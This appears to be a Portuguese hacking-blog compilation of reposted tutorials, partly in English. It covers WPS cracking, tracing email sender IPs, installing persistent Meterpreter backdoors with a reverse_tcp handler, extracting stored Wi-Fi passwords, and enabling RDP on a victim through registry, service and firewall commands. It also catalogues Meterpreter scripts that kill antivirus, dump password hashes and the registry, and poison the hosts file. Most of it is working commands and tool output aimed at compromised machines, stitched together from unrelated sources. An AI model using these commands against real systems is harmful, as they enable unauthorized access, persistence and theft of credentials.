features :

• Graphic User Interface (GUI) WPS encryption cracking.
• Advanced Attack with Generic Dictionary.
• Advanced Dictionary Attack with Enhanced.
• Updated Assisted Reaver-WPS.
• Database with PINs.
• Change MAC Address.
• Supported in Gt and Gtk.
• Scan networks.

Nesse tutorial,vou  mostrar como detectar o endereço IP do remetente.

O e-mail endereço IP do remetente é depender de qual provedor de e-mail que você usa. Como sabemos, há muitos provedor de email que fornecem conta de e-mail gratuito, mas por agora só usamos Gmail, Yahoo e Windows Live Hotmail. Com a lógica como verificar o endereço IP do remetente de e-mail que eu espero que você também pode fazer o mesmo com outro provedor de e-mail.

Requirement:

1. Internet connection 

Step by Step how to Check Email Sender IP Address:

1. First step I will try to send an email from Yahoo account to Gmail account.

2. In Gmail you can view the email sender IP address by show the original email in the menu.

3. When you click the link it will show some text page that displaying the details of how the message sent from Yahoo until the email arrive in your inbox. Actually the logic is the same when you sending a packet through ups or fedex, you can track the path of your packet where they made a checkpoint(but not as detail as this two logistics service).

The text “Received: from” will show you the email sender IP address (see the red box).

From this three steps, we know that if the sender use Yahoo, we can know the sender original IP address.

4. Now the next I will try to send email fro Gmail to Yahoo. Here is the screenshot.

5.To check the email sender IP address, you can click the actions and choose view full header.

6. Gmail will use the X-Originating-IP to show the sender IP address, but for the privacy they mask and change the Original email sender IP address with Google ip address.

If you see the email sender IP address in the red box above, it was Google IP address.

7. Now the last one is testing using Windows Live Hotmail. I try to send it both to Gmail and yahoo. Here is the result in Gmail.

Last year Windows Live Hotmail still have the X-Originating-IP, but start in January 2013 they said that they started to protect their users by disable the X-Originating-IP and new variable show up there as X-EIP. This X-EIP is always change dynamically even you send the same email from the same ip address, so maybe it’s a little hard enough to break it 

8. Update (the real case)

When I just want to finish this tutorial, then suddenly one email come to my inbox, thanks to that guy helped me to finish this tutorial 

Rea is one of my friend in Indonesia, I believe she will not sending me this kind of link 

Since the sender was using yahoo account, so it is possible for us to detect the original IP address where they come from.

9. Now after knowing the email sender IP address 79.129.249.124, let’s find out more about this IP address by whois-ing here using my tools, or you can visit whatismyipaddress.com to check about that email sender IP address. Here is the result:

Conclusion:

1. From the three free email provider above, we know that the format of email header is depend on which provider we use to send that email.

2. If you send email from Gmail and Windows Live Hotmail they will hide the email sender IP address.

3. If you send email from Yahoo the recipient of your email can know your ip address.

hope it useful 

FONTE:Vishnuvalentino

Galera, tutorial está parte dele em inglês.

Algumas pessoas e ACERCA estudante pedindo o que devemos fazer depois de explorar com sucesso comprometer ou vítima?

Alguns explorar Tal como CVE-2010-3962 quando a vítima Executado pode fazer computador trava. Quando algum usuário de computador trava optar por reiniciar o computador e ele vai fazer o exploit Torna-se ineficaz anterior.

O que vamos fazer aqui é Mantendo o acesso, a deixar-se uma maneira mais fácil de volta para o sistema posteriormente. Ao utilizar este método, se o serviço é para baixo ou você explorados atualizado, você ainda pode ganhar acesso ao sistema para uso futuro.

O Serviço Meterpreter Metasploit persistente é o que vamos usar neste tutorial, mas não há aviso Quando você usa esse Meterpreter persistente como mostrado neste tutorial requer nenhuma autenticação. Isto significa que ganha acesso a qualquer um que possa acessar a porta de sua porta de trás! Esta não é uma coisa boa se você está conduzindo um teste de penetração, este poderia ser como um risco significativo.

Requirement :

1. Backtrack 5 (or other Linux OS)

2. Metasploit Framework 3 (Included in Backtrack 5)

Step By Step :

1. You need to set your payload of your exploit to meterpreter to do this method.

2. run persistence -h to view help list

3. We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try toconnect back to our listener every 5 seconds at IP address 192.168.8.89 on port 8080.

Notice that the script output gives you the command to “remove” the persistent listener when you are done with it. Be sure to make note of it so you don’t leave an unauthenticated backdoor on the system.

Explanation :

-U : start the backdoor when user log in to system

-i : load backdoor every 5 second

-p : will running on port 8080

-r : connect back to 192.168.8.90 (specified ip address)

4. To make sure that it works, try reboot the remote system and set up our payload handler.

msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.90
LHOST => 192.168.8.90
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.8.90:8080
[*] Starting the payload handler...

5. When the remote user restart the system and re-login to the system, there should be like this(we should wait until the backdoor executed by remote system) :

Let we see what happen to remote user :

There’s established connection between attacker and remote host.

Hope it’s useful 

Fonte:VishnuValentino

Esses scripts fornecer funcionalidade relacionada com o tema sem fio ou redes sem fio. O objectivo destes é o de extrair o máximo de informação que pode existir perfis sem fios armazenado na máquina violados. No Windows 7 ou Vista você obter a senha para redes WPA, enquanto o Windows XP é obtido PBKDF2 chave derivada.

O script de post/windows/wlan/wlan_bss_list fornece informações sobre as redes sem fio que tenha violado a máquina configurada. O script de pós / windows / WLAN / wlan_current_connection rede WiFi mostra que a máquina está ligada comprometida, se ele estiver conectado a um. O post script / windows / wlan / wlan_disconnect tentar desligar o aparelho violado a conexão sem fio. E, finalmente, o post script / windows / wlan / wlan_profile recupera informações em formato XML, referindo-se a redes sem fio configurados na máquina violada, incluindo informações como a senha da rede Wi-Fi.

Uma vez que você tem uma sessão Meterpreter, a primeira ação que ocorre é fazer uma lista de redes sem fio que o aparelho armazenar, este fato significa que, geralmente, em algum momento violou a máquina está ligada a essas redes .

Com o script de post/windows /wlan /wlan_profile pode obter um despejo de um arquivo em formato XML com os detalhes de redes sem fio, incluindo senhas esta informação para se conectar a redes sem fio. Na foto você pode ver uma parte do depósito, a parte em que informações sensíveis, como senha e nome da rede.

Finalmente, você também pode realizar esta operação através da linha de comando da máquina violados. Para abrir uma linha de comando comando é executado Meterpreter shell e digite netsh wlan mostra perfil para recuperar informações de redes sem fio configurados na máquina violados.

Fonte:FluProject

As auditorias web, é imprescindível a utilização de uma ferramenta como “enumeração. Isto ajuda-nos a encontrar painéis de administração, diretório com informações confidenciais. E até mesmo diretórios com permissões incorretas que permitem que lista arquivos.

Faça o download da ferramenta e ver listas de arquivos que vai procurar

darkmac:lists marc$ more files.txt
“pictures”[###]\”.jpg”
“DCP_”[####]\”.jpg”
“IMG_”[####]\”.jpg”
“”[##]\”.jpg”
“dsc”[#####]\”.jpg”
“dscn”[####]\”.jpg”
“mvc-”[###]\”.jpg”
“mvc”[#####]\”.jpg”
“P101″[####]\”.jpg”
“IMG_”[###]\”.jpg”
“IMAG”[####]\”.jpg”
“_MG_”[####]\”.jpg”
“dscf”[####]\”.jpg”
“pdrm”[####]\”.jpg”
“IM”[######]\”.jpg”
“EX”[######]\”.jpg”
“pict”[####]\”.jpg”
“P”[#######]\”.JPG”
“IMGP”[####]\”.JPG”
“PANA”[####]\”.JPG”
“Image(“[##]\”).JPG”
“DSCI”[####]\”.JPG”
“PICT”[#####]\”.jpg”
“HPIM”[####]\”.jpg”
“DSCN”[####]\”.jpg”
“DSC”[#####]\”.jpg”
“IMG_”[#####]\”.jpg”
darkmac:lists marc$

Podemos modificar esta lista a adicionar as nossas.

Lançamos a ferramenta contra um servidor web em um ambiente controlado.

O pedido irá tornar a ferramenta é como se segue:

“GET /pictures298.jpg HTTP/1.1″

Se vemos que os pedidos estão surgindo realmente, podemos ver os logs do servidor

Como você pode ver a ferramenta está a tentar combinações diferentes, se, por exemplo, deseja bloquear este difusor, poderíamos criar algo como:

#Block scanners
 <Directory / >
     BrowserMatch ^wdivulge deny_host
     Deny from env=deny_host
  </Directory>

Temos uma ferramenta mais para o nosso arsenal!

Fonte:Flu

Vou adiantando que o tutorial está em Inglês, não tive saco pra traduzir rsrsrss.

Type : Tips and Trick

Level : Easy

There’s a lot of people while learn computer hacking, they didn’t like command prompt or a terminal too much. Some of them prefer quick and fast hacking with a nice and friendly interface that just click here and click there then it finished  .

Today I will wrote tips and trick how to enable remote desktop using command prompt… (hey! it’s still usecommand prompt!)..but wait, this command prompt all you need just to copy and paste and execute it. You can execute the command in this tutorial from Telnet or Shell you got from compromised system, etc.

You can view my last two tutorial to help you much more understand this tips and trick :

How to create a simple exploit for Windows 7

How to add user with administrator rights via comand prompt

Let’s prepare the easy and simple tips and trick how to enable remote desktop using command prompt.

Requirements :

1. Telnet [or] Command Prompt –> with administrative rights

Step by Step :

1. This tips and trick I will continue from the tutorial about Creating Simple Exploit using Metasploit. So in this case you already got the shell or the command prompt.

2. Type this command to enable Remote Desktop on victim machine :

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

3. This step have not finished yet….we need to start the Terminal Service, because terminal service was disabled by default

sc config TermService start= auto

that command will make terminal service will start every time the computer started.

4. Now we need to start the terminal service for use right now, because the command on step 4 only to maketerminal service started every computer started and does not start the service.

net start Termservice

5. Okay everything already done, and we’ve almost done. The next step we need to open port that will be used by remote desktop on firewall, so the alert will not popping up while someone connect to remote desktop server.

netsh.exe

firewall

add portopening TCP 3389 "Remote Desktop"

The command above will make firewall accepted every packet that came to port 3389 that used for Remote Desktop without alert.

6. Open a new terminal (Backtrack 5) or you can use Remote Desktop Client in Windows(Start –> All Programs –> Accessories –> Remote Desktop Connection). In this tips and trick I will use RDesktop in Backtrack 5 R2.

rdesktop 192.168.8.92

7. A GUI (Graphical User Interface) will pop out ask for user name and password.

8. Yes we’re in and successfully enable the remote desktop.

Hope it’s useful m8 

FYI :

– You can add the user via command prompt by following this tutorial about how to add user with administrative rights via command prompt (click here).

FONTE:VishnuValentino

Metasploit vem com uma tonelada de scripts úteis que podem ajudar você no Metasploit Framework. Esses scripts são normalmente feitas por terceiros e eventualmente adotada para o repositório de subversão. Nós vamos passar por alguns deles e orientá-lo como você pode usá-los em seu próprio teste de penetração.

Os scripts abaixo mencionados destinam-se a ser utilizado com um invólucro Meterpreter após o ataque com êxito de um alvo. Depois de ter ganho uma sessão com o alvo que você pode utilizar estes scripts para melhor atender às suas necessidades.

checkvm

The ‘checkvm’ script, as its name suggests, checks to see if you exploited a virtual machine. This information can be very useful.

 meterpreter > run checkvm  

 [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
 [*] This is a VMware Workstation/Fusion Virtual Machine

getcountermeasure

The ‘getcountermeasure’ script checks the security configuration on the victims system and can disable other security measures such as A/V, Firewall, and much more.

 meterpreter > run getcountermeasure 

 [*] Running Getcountermeasure on the target... 
 [*] Checking for contermeasures...
 [*] Getting Windows Built in Firewall configuration...
 [*]    
 [*]     Domain profile configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]     Exception mode                    = Enable
 [*]    
 [*]     Standard profile configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]     Exception mode                    = Enable
 [*]    
 [*]     Local Area Connection 6 firewall configuration:
 [*]     -------------------------------------------------------------------
 [*]     Operational mode                  = Disable
 [*]    
 [*] Checking DEP Support Policy...

getgui

The ‘getgui’ script is used to enable RDP on a target system if it is disabled.

 meterpreter > run getgui 

 Windows Remote Desktop Enabler Meterpreter Script
 Usage: getgui -u  -p

 OPTIONS:

 -e   Enable RDP only.
 -h   Help menu.
 -p   The Password of the user to add.
 -u   The Username of the user to add.

 meterpreter > run getgui -e

 [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
 [*] Carlos Perez carlos_perez@darkoperator.com
 [*] Enabling Remote Desktop
 [*] RDP is already enabled
 [*] Setting Terminal Services service startup mode
 [*] Terminal Services service is already set to auto
 [*] Opening port in local firewall if necessary

get_local_subnets

The ‘get_local_subnets’ script is used to get the local subnet mask of a victim. This can be very useful information to have for pivoting.

 meterpreter > run get_local_subnets 

 Local subnet: 10.211.55.0/255.255.255.0

gettelnet

The ‘gettelnet’ script is used to enable telnet on the victim if it is disabled.

 meterpreter > run gettelnet 

 Windows Telnet Server Enabler Meterpreter Script
 Usage: gettelnet -u  -p

 OPTIONS:

 -e   Enable Telnet Server only.
 -h   Help menu.
 -p   The Password of the user to add.
 -u   The Username of the user to add.

 meterpreter > run gettelnet -e

 [*] Windows Telnet Server Enabler Meterpreter Script
 [*] Setting Telnet Server Services service startup mode
 [*] The Telnet Server Services service is not set to auto, changing it to auto ...
 [*] Opening port in local firewall if necessary

hostsedit

The ‘hostsedit’ Meterpreter script is for adding entries to the Windows hosts file. Since Windows will check the hosts file first instead of the configured DNS server, it will assist in diverting traffic to a fake entry or entries. Either a single entry can be provided or a series of entries can be provided with a file containing one entry per line.

meterpreter > run hostsedit 

 OPTIONS:

 -e   Host entry in the format of IP,Hostname.
 -h   Help Options.
 -l   Text file with list of entries in the format of IP,Hostname. One per line.

 Example:

 run hostsedit -e 127.0.0.1,google.com
 run hostsedit -l /tmp/fakednsentries.txt

 meterpreter > run hostsedit -e 10.211.55.162,www.microsoft.com
 [*] Making Backup of the hosts file.
 [*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts62497.back
 [*] Adding Record for Host www.microsoft.com with IP 10.211.55.162
 [*] Clearing the DNS Cache

killav

The ‘killav’ script can be used to disable most antivirus programs running as a service on a target.

 meterpreter > run killav 

 [*] Killing Antivirus services on the target...
 [*] Killing off cmd.exe...

remotewinenum

The ‘remotewinenum’ script will enumerate system information through wmic on victim. Make note of where the logs are stored.

meterpreter > run remotewinenum

 Remote Windows Enumeration Meterpreter Script
 This script will enumerate windows hosts in the target environment
 given a username and password or using the credential under witch
 Meterpreter is running using WMI wmic windows native tool.
 Usage:

 OPTIONS:

 -h   Help menu.
 -p   Password of user on target system
 -t   The target address
 -u   User on the target system (If not provided it will use credential of process)

 meterpreter > run remotewinenum -u administrator -p ihazpassword -t 10.211.55.128

 [*] Saving report to /root/.msf3/logs/remotewinenum/10.211.55.128_20090711.0142 
 [*] Running WMIC Commands ....
 [*]     running command wimic environment list
 [*]     running command wimic share list
 [*]     running command wimic nicconfig list
 [*]     running command wimic computersystem list
 [*]     running command wimic useraccount list
 [*]     running command wimic group list
 [*]     running command wimic sysaccount list
 [*]     running command wimic volume list brief
 [*]     running command wimic logicaldisk get description,filesystem,name,size
 [*]     running command wimic netlogin get name,lastlogon,badpasswordcount
 [*]     running command wimic netclient list brief
 [*]     running command wimic netuse get name,username,connectiontype,localname
 [*]     running command wimic share get name,path
 [*]     running command wimic nteventlog get path,filename,writeable
 [*]     running command wimic service list brief
 [*]     running command wimic process list brief
 [*]     running command wimic startup list full
 [*]     running command wimic rdtoggle list
 [*]     running command wimic product get name,version
 [*]     running command wimic qfe list

scraper

The ‘scraper’ script can grab even more system information, including the entire registry.

meterpreter > run scraper

 [*] New session on 10.211.55.128:4444...
 [*] Gathering basic system information...
 [*] Dumping password hashes...
 [*] Obtaining the entire registry...
 [*] Exporting HKCU
 [*] Downloading HKCU (C:\WINDOWS\TEMP\LQTEhIqo.reg)
 [*] Cleaning HKCU
 [*] Exporting HKLM
 [*] Downloading HKLM (C:\WINDOWS\TEMP\GHMUdVWt.reg)

From our examples above we can see that there are plenty of Meterpreter scripts for us to enumerate a ton of information, disable anti-virus for us, enable RDP, and much much more.

winenum

The ‘winenum’ script makes for a very detailed windows enumeration tool. It dumps tokens, hashes and much more.

meterpreter > run winenum 

 [*] Running Windows Local Enumerion Meterpreter Script
 [*] New session on 10.211.55.128:4444...
 [*] Saving report to /root/.msf3/logs/winenum/10.211.55.128_20090711.0514-99271/10.211.55.128_20090711.0514-99271.txt
 [*] Checking if SSHACKTHISBOX-0 is a Virtual Machine ........
 [*]     This is a VMware Workstation/Fusion Virtual Machine 
 [*] Running Command List ...
 [*]     running command cmd.exe /c set
 [*]     running command arp -a
 [*]     running command ipconfig /all
 [*]     running command ipconfig /displaydns
 [*]     running command route print
 [*]     running command net view
 [*]     running command netstat -nao
 [*]     running command netstat -vb
 [*]     running command netstat -ns
 [*]     running command net accounts
 [*]     running command net accounts /domain
 [*]     running command net session
 [*]     running command net share
 [*]     running command net group
 [*]     running command net user
 [*]     running command net localgroup
 [*]     running command net localgroup administrators
 [*]     running command net group administrators
 [*]     running command net view /domain
 [*]     running command netsh firewall show config
 [*]     running command tasklist /svc
 [*]     running command tasklist /m
 [*]     running command gpresult /SCOPE COMPUTER /Z
 [*]     running command gpresult /SCOPE USER /Z
 [*] Running WMIC Commands ....
 [*]     running command wmic computersystem list brief
 [*]     running command wmic useraccount list
 [*]     running command wmic group list
 [*]     running command wmic service list brief
 [*]     running command wmic volume list brief
 [*]     running command wmic logicaldisk get description,filesystem,name,size
 [*]     running command wmic netlogin get name,lastlogon,badpasswordcount
 [*]     running command wmic netclient list brief
 [*]     running command wmic netuse get name,username,connectiontype,localname
 [*]     running command wmic share get name,path
 [*]     running command wmic nteventlog get path,filename,writeable
 [*]     running command wmic process list brief
 [*]     running command wmic startup list full
 [*]     running command wmic rdtoggle list
 [*]     running command wmic product get name,version
 [*]     running command wmic qfe
 [*] Extracting software list from registry
 [*] Finished Extraction of software list from registry
 [*] Dumping password hashes...
 [*] Hashes Dumped
 [*] Getting Tokens...
 [*] All tokens have been processed
 [*] Done!